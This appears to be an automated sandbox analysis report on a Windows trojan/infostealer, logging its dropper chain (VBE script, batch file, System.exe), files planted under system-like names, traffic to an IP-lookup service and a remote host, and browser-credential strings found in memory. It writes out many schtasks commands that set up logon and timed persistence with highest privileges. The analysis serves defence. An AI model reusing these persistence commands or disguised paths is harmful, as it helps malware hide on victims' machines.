              Source: Idle.exe, 0000001E.00000002.4141030211.00000000128A0000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012699000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012A09000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012971000.00000004.00000800.00020000.00000000.sdmp, 3ADQ97D0F6.30.dr, s826aptdcS.30.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: Idle.exe, 0000001E.00000002.4141030211.00000000128A0000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012699000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012A09000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012971000.00000004.00000800.00020000.00000000.sdmp, 3ADQ97D0F6.30.dr, s826aptdcS.30.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: Idle.exe, 0000001E.00000002.4123458318.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/jsonx
              Source: Idle.exe, 0000001E.00000002.4141030211.0000000012CE0000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.00000000131E0000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012CD8000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.00000000131D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
              Source: Idle.exe, 0000001E.00000002.4141030211.00000000131E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: Idle.exe, 0000001E.00000002.4123458318.0000000002689000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefox
              Source: Idle.exe, 0000001E.00000002.4141030211.00000000131E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
              Source: Idle.exe, 0000001E.00000002.4141030211.0000000012B8D000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4123458318.0000000002689000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012AE8000.00000004.00000800.00020000.00000000.sdmp, KR0POkAyjk.30.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: Idle.exe, 0000001E.00000002.4141030211.0000000012AC3000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012B68000.00000004.00000800.00020000.00000000.sdmp, KR0POkAyjk.30.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: Idle.exe, 0000001E.00000002.4141030211.0000000012B8D000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4123458318.0000000002689000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012AE8000.00000004.00000800.00020000.00000000.sdmp, KR0POkAyjk.30.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: Idle.exe, 0000001E.00000002.4141030211.0000000012AC3000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012B68000.00000004.00000800.00020000.00000000.sdmp, KR0POkAyjk.30.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: Idle.exe, 0000001E.00000002.4141030211.00000000128A0000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012699000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012A09000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012971000.00000004.00000800.00020000.00000000.sdmp, 3ADQ97D0F6.30.dr, s826aptdcS.30.drString found in binary or memory: https://www.ecosia.org/newtab/
              Source: Idle.exe, 0000001E.00000002.4141030211.00000000128A0000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012699000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012A09000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012971000.00000004.00000800.00020000.00000000.sdmp, 3ADQ97D0F6.30.dr, s826aptdcS.30.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: Idle.exe, 0000001E.00000002.4141030211.0000000012CE0000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.00000000131E0000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012CD8000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.00000000131D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: Idle.exe, 0000001E.00000002.4123458318.0000000002689000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
              Source: Idle.exe, 0000001E.00000002.4141030211.00000000131E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: Idle.exe, 0000001E.00000002.4123458318.0000000002689000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
              Source: Idle.exe, 0000001E.00000002.4141030211.00000000131E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: Idle.exe, 0000001E.00000002.4123458318.0000000002689000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
              Source: Idle.exe, 0000001E.00000002.4141030211.0000000012CE8000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.00000000131E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: Idle.exe, 0000001E.00000002.4123458318.0000000002689000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/p
              Source: Idle.exe, 0000001E.00000002.4141030211.00000000131E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: Idle.exe, 0000001E.00000002.4123458318.0000000002689000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
              Source: Idle.exe, 0000001E.00000002.4141030211.0000000012CE8000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.00000000131E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53639
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53641
              Source: unknownNetwork traffic detected: HTTP traffic on port 53641 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 53639 -> 443
              Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:53639 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:53641 version: TLS 1.2
              Source: C:\Recovery\Idle.exeWindow created: window name: CLIPBRDWNDCLASS

              System Summary

              Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
              Source: C:\Recovery\Idle.exeProcess Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_000F718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_000F718C
              Source: C:\ProgramData\ssh\System.exeFile created: C:\Windows\TAPI\lmXqPxTfNHomnnafzTOKZnFns.exe
              Source: C:\ProgramData\ssh\System.exeFile created: C:\Windows\TAPI\bc31d5a79a9161
              Source: C:\ProgramData\ssh\System.exeFile created: C:\Windows\LiveKernelReports\WinStore.App.exe
              Source: C:\ProgramData\ssh\System.exeFile created: C:\Windows\LiveKernelReports\fd168b19609dff
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: String function: 0010E28C appears 35 times
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: String function: 0010E360 appears 52 times
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: String function: 0010ED00 appears 31 times
              Source: System.exe.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
              Source: lmXqPxTfNHomnnafzTOKZnFns.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
              Source: WmiPrvSE.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
              Source: Idle.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
              Source: lmXqPxTfNHomnnafzTOKZnFns.exe0.4.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
              Source: upfc.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
              Source: lmXqPxTfNHomnnafzTOKZnFns.exe1.4.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
              Source: lmXqPxTfNHomnnafzTOKZnFns.exe2.4.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
              Source: lmXqPxTfNHomnnafzTOKZnFns.exe3.4.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
              Source: WinStore.App.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
              Source: lmXqPxTfNHomnnafzTOKZnFns.exe4.4.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
              Source: lmXqPxTfNHomnnafzTOKZnFns.exe5.4.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
              Source: 6uPVRnocVS.exeBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs 6uPVRnocVS.exe
              Source: 6uPVRnocVS.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: System.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: lmXqPxTfNHomnnafzTOKZnFns.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: WmiPrvSE.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: Idle.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: lmXqPxTfNHomnnafzTOKZnFns.exe0.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: upfc.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: lmXqPxTfNHomnnafzTOKZnFns.exe1.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: lmXqPxTfNHomnnafzTOKZnFns.exe2.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: lmXqPxTfNHomnnafzTOKZnFns.exe3.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: WinStore.App.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: lmXqPxTfNHomnnafzTOKZnFns.exe4.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: lmXqPxTfNHomnnafzTOKZnFns.exe5.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@44/47@3/3
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_000F6EC9 GetLastError,FormatMessageW,0_2_000F6EC9
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_00109E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00109E1C
              Source: C:\ProgramData\ssh\System.exeFile created: C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\WmiPrvSE.exeJump to behavior
              Source: C:\ProgramData\ssh\System.exeFile created: C:\Users\Default User\lmXqPxTfNHomnnafzTOKZnFns.exeJump to behavior
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7036:120:WilError_03
              Source: C:\Recovery\Idle.exeMutant created: \Sessions\1\BaseNamedObjects\Local\58b06ae7820700040700431fad5b9c3b5c7f0ca7
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeMutant created: \Sessions\1\BaseNamedObjects\Global\CLR_PerfMon_WrapMutex
              Source: C:\ProgramData\ssh\System.exeFile created: C:\Users\user\AppData\Local\Temp\K8BHrhuEP2Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ssh\ML9lnBLRkA6sXD0.bat" "
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCommand line argument: sfxname0_2_0010D5D4
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCommand line argument: sfxstime0_2_0010D5D4
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCommand line argument: STARTDLG0_2_0010D5D4
              Source: 6uPVRnocVS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: 6uPVRnocVS.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
              Source: C:\ProgramData\ssh\System.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
              Source: C:\Recovery\Idle.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeFile read: C:\Windows\win.iniJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: rL05p88NW9.30.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: 6uPVRnocVS.exeVirustotal: Detection: 65%
              Source: 6uPVRnocVS.exeReversingLabs: Detection: 71%
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeFile read: C:\Users\user\Desktop\6uPVRnocVS.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\6uPVRnocVS.exe "C:\Users\user\Desktop\6uPVRnocVS.exe"
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\ssh\gnR14pXyuoFKj0R1.vbe"
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ssh\ML9lnBLRkA6sXD0.bat" "
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ProgramData\ssh\System.exe "C:\\ProgramData\ssh\System.exe"
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\lmXqPxTfNHomnnafzTOKZnFns.exe'" /f
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFns" /sc ONLOGON /tr "'C:\Users\Default User\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 14 /tr "'C:\Windows\TAPI\lmXqPxTfNHomnnafzTOKZnFns.exe'" /f
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFns" /sc ONLOGON /tr "'C:\Windows\TAPI\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 13 /tr "'C:\Windows\TAPI\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 10 /tr "'C:\Users\Default\AppData\Roaming\lmXqPxTfNHomnnafzTOKZnFns.exe'" /f
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFns" /sc ONLOGON /tr "'C:\Users\Default\AppData\Roaming\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 8 /tr "'C:\Users\Default\AppData\Roaming\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\WmiPrvSE.exe'" /f
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\WmiPrvSE.exe'" /rl HIGHEST /f
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\WmiPrvSE.exe'" /rl HIGHEST /f
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\lmXqPxTfNHomnnafzTOKZnFns.exe'" /f
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFns" /sc ONLOGON /tr "'C:\Users\Default User\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 9 /tr "'C:\Recovery\Idle.exe'" /f
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Recovery\Idle.exe'" /rl HIGHEST /f
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 5 /tr "'C:\Recovery\Idle.exe'" /rl HIGHEST /f
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 12 /tr "'C:\Recovery\lmXqPxTfNHomnnafzTOKZnFns.exe'" /f
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFns" /sc ONLOGON /tr "'C:\Recovery\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 13 /tr "'C:\Recovery\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 9 /tr "'C:\Recovery\upfc.exe'" /f
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Recovery\upfc.exe'" /rl HIGHEST /f
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 14 /tr "'C:\Recovery\upfc.exe'" /rl HIGHEST /f
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 12 /tr "'C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe'" /f
              Source: unknownProcess created: C:\Recovery\Idle.exe C:\Recovery\Idle.exe
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFns" /sc ONLOGON /tr "'C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 6 /tr "'C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f
              Source: unknownProcess created: C:\Recovery\Idle.exe C:\Recovery\Idle.exe
              Source: unknownProcess created: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe "C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe"
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WinStore.AppW" /sc MINUTE /mo 14 /tr "'C:\Windows\LiveKernelReports\WinStore.App.exe'" /f
              Source: unknownProcess created: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe "C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe"
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WinStore.App" /sc ONLOGON /tr "'C:\Windows\LiveKernelReports\WinStore.App.exe'" /rl HIGHEST /f
              Source: C:\ProgramData\ssh\System.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WinStore.AppW" /sc MINUTE /mo 6 /tr "'C:\Windows\LiveKernelReports\WinStore.App.exe'" /rl HIGHEST /f
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\ssh\gnR14pXyuoFKj0R1.vbe" Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ssh\ML9lnBLRkA6sXD0.bat" "Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ProgramData\ssh\System.exe "C:\\ProgramData\ssh\System.exe"Jump to behavior
              Source: C:\ProgramData\ssh\System.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: api-ms-win-core-synch-l1-2-0.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: api-ms-win-core-fibers-l1-1-1.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: api-ms-win-core-localization-l1-2-1.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: dxgidebug.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: riched20.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: usp10.dllJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeSection loaded: msls31.dllJump to behavior
